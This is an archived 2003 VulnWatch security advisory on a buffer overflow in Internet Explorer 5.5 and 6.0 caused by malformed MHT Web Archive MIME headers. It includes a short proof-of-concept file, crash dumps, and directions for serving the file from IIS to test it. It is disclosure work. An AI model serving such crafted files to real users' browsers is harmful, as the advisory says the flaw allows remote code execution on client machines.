[VulnWatch] .MHT Buffer Overflow in Internet Explorer

From: Tom Tanaka (tomatell@canon-sol.jp)
Date: 03/10/03

  • Next message: Frog Man: "[VulnWatch] PHP-Nuke 6.0 & 6.5RC2 SQL Injection Again"
    From: "Tom Tanaka" <tomatell@canon-sol.jp>
    To: <vulnwatch@vulnwatch.org>
    Date: Mon, 10 Mar 2003 13:13:14 +0900
    
    

    CANON SYSTEM SOLUTIONS INC. Security Alert

    VULNERABILITY:.MHT Buffer Overflow in Internet Explorer

    DATE FOUND:March 2, 2003

    Severity:High Risk(code can be executed remotely)
    ========================================================================
    ======
    SUMMARY:

    IE5 introduced the new 'Web Archive' format for storing web pages, which
    have the extension MHT. The 'Web Archive' saves a web page as a single
    document complete with all images. The format is a standard
    mime/multipart e-mail message, a mime decoding program such as 7bit,
    8bit and Base 64 decoder should be able to turn it into something usable
    with your OS and browser of choice.

    This format is pretty nifty and usable, however, there is a potential
    security breach found when used with encoded executable along with
    malformed MIME header in the 'Web Archive'. If the encode data is
    executable or has a single word "MZP" encoded within and Content-Type is
    not designated, IE5 will be terminated by critical buffer
    overflow.Consequently, one could compromise the client pc by executing
    malicious code in the memory.
    ========================================================================
    ======
    AFFECTED SYSTEM:

    Microsoft Internet Explorer 5.5 and 6.0; prior versions are not
    vulnerable.
    ========================================================================
    ======
    ANALYSIS:

    RFC822 describes the structure of message header used for the MIME.
    The followings are some of the identifiers defined for the MIME header.

     MIME-Version:
     Content-Type:
     Content-Trasfer-Encoding:
     Content-ID:
     Content-Description:

    The 'Content-Type' is used for defining the types of media transfered.
    The 'Web Archive' format utilizes the Multipart/Related
    content-type(defined in RFC2387) to properly embed the multiple web
    content files.
    As described in RFC2387, the Multipart/Related content-type provides a
    common mechanism for representing objects that are aggregates of related
    MIME body parts.
    When tranferring html or plain text data encoded in the 'Web Archive',
    IE5
    interprets as a plain text with 'carriage return' code(0D0A) , otherwise
    as binary data without 'carriage return' code(0D0A). By manipulating the
    MIME header structure and the Base64 encoded data as an executable,4
    bytes of memory can be overwritten.

    PROOF OF CONCEPT:

    The following format is usually used for the Web Archive.
    ----------------------------------------------
    From: <Saved from Microsoft Internet Explorer 5>
    Subject:
    =?iso-2022-jp?B?GyRCJT0lVSVIJSYlJyUiJVclbSVAJS8lSBsoQiBIb21lUGFnZQ==?=
    Date: Tue, 4 Mar 2003 02:16:23 +0900
    MIME-Version: 1.0
    Content-Type: multipart/related;
            boundary="----=_NextPart_000_0000_01C2E1F4.0D559EA0";
            type="text/html"
    X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106

    This is a multi-part message in MIME format.

    ------=_NextPart_000_0000_01C2E1F4.0D559EA0
    Content-Location:file:///tomatell.exe
    Content-Transfer-Encoding: base64

    TVpQ
    ----------------------------------------------

    The following sample format contains malformed MIME header along with
    the Base64 encoded executable.
    ----------------------------------------------
    MIME-Version: 1.0
    ------=_NextPart_000_0000_01C2E1F4.0D559EA0
    Content-Location:file:///tomatell.exe
    Content-Transfer-Encoding: base64

    TVpQ
    ----------------------------------------------

    Note that the encoded string, "TVpQ", is the Win32 EXE signature located
    at the first three bytes of the EXE header. This is for the Win32 system
    to identify the data as a Win32 executable file.
    IE5 somehow reads this signature and interprets the data as an
    executable whereas the MIME encoder/decoder module,'inetcomm.dll',
    decodes as a plain 7 or 8 bit text data. Thus, IE5 creates a stream with
    a smaller buffersize than that of Base64 decoder has.

    The following error will occur when the above file is browsed by IE5.

    Unhandled exception in iexplore.exe: 0xC0000005: Access Violation.

    By debugging through the crash dump, the exception error is generated at
    the EIP(32-bit Instruction Pointer)=74CF497E called from inetcomm.dll to
    Kernel32.

    Register
    EAX = 00000000 EBX = 05AD3A20 ECX = 001FE074 EDX = 001FE190
    ESI = 05AD39D8 EDI = 00000000 [EIP = 74CF497E] ESP = 0607B2BC
    EBP = 0607B2FC EFL = 00000246

    \KernelObjects\CritSecOutOfMemoryEvent

    74cf494c ff157412cd74 call dword ptr
    [KERNEL32.EnterCriticalSection]
    74cf4952 834e3c02 or dword ptr [esi+3c],+02
    74cf4956 33ff xor edi,edi
    74cf4958 397e1c cmp dword ptr [esi+1c],edi
    74cf495b 743f jz 74cf499c
    74cf495d 397c2410 cmp dword ptr [esp+10],edi
    74cf4961 8bce mov ecx,esi
    74cf4963 7d06 jnl 74cf496b
    74cf4965 ff742410 push dword ptr [esp+10]
    74cf4969 eb25 jmp short 74cf4990

    74cf496b c746441f000000 mov dword ptr [esi+44],0000001f
    74cf4972 e888f3ffff call 74cf3cff
    74cf4977 3bc7 cmp eax,edi
    74cf4979 7c12 jl 74cf498d
    74cf497b 8b461c mov eax,dword ptr [esi+1c]
    74cf497e 8b08 mov ecx,dword ptr [eax] //Exception

    You could test the vulnerablity by copying above exploit to a file
    with an extention ".mht" and place it at the default root directory
    of IIS web server and set it as a default html of the server.

    WORKAROUND:
    Currently none available.

    Credit:
    Tom Tanaka

    /_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
     Tom Tanaka <tomatell@canon-sol.co.jp>
     Technical Manager, Security
     Software Products Department
     Tokyo Office
     CANON SYSTEM SOLUTIONS INC..
     1-2-18 Ikenohata Taito-ku, Tokyo 110-0008, Japan
     Ph.: +81-3-5815-7243
     Fax : +81-3-5815-7262
    /_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/


  • Next message: Frog Man: "[VulnWatch] PHP-Nuke 6.0 & 6.5RC2 SQL Injection Again"

    Relevant Pages

    • .MHT Buffer Overflow in Internet Explorer
      ... The format is a standard ... If the encode data is ... followings are some of the identifiers defined for the MIME header. ... The 'Web Archive' format utilizes the Multipart/Related content-type ...
      (Bugtraq)
    • Re: .MHT Buffer Overflow in Internet Explorer
      ... .MHT Buffer Overflow in Internet Explorer ... The format is a standard ... one could compromise the client pc by executing ... > followings are some of the identifiers defined for the MIME header. ...
      (Bugtraq)
    • Re: Is it possible to use the value of the PROGRAM ID within the source code?
      ... "SSLNGC0313587 New LE Callable Service to get Program Names ... - The currently executing program's name ... The docs for that format ought to tell you> how to find the executable name. ... > This method just begs for someone to reply with a "Cobol programmers> should never have to know load module format or use pointers or anything> that smells of programming..." ...
      (comp.lang.cobol)
    • Re: Array size limit in Perl
      ... The data format is as follows, ... And my perl code is as follows. ... Have you tried printing this string rather than just executing it, ... examine the sorted array. ...
      (perl.beginners)
    • Re: exporting crystal report to Excel
      ... when I export it to Excel or some other MS office format like MsWord format. ... So I step through each line and just after executing ... >> Dim oStream As New System.IO.MemoryStream ...
      (microsoft.public.dotnet.framework.aspnet)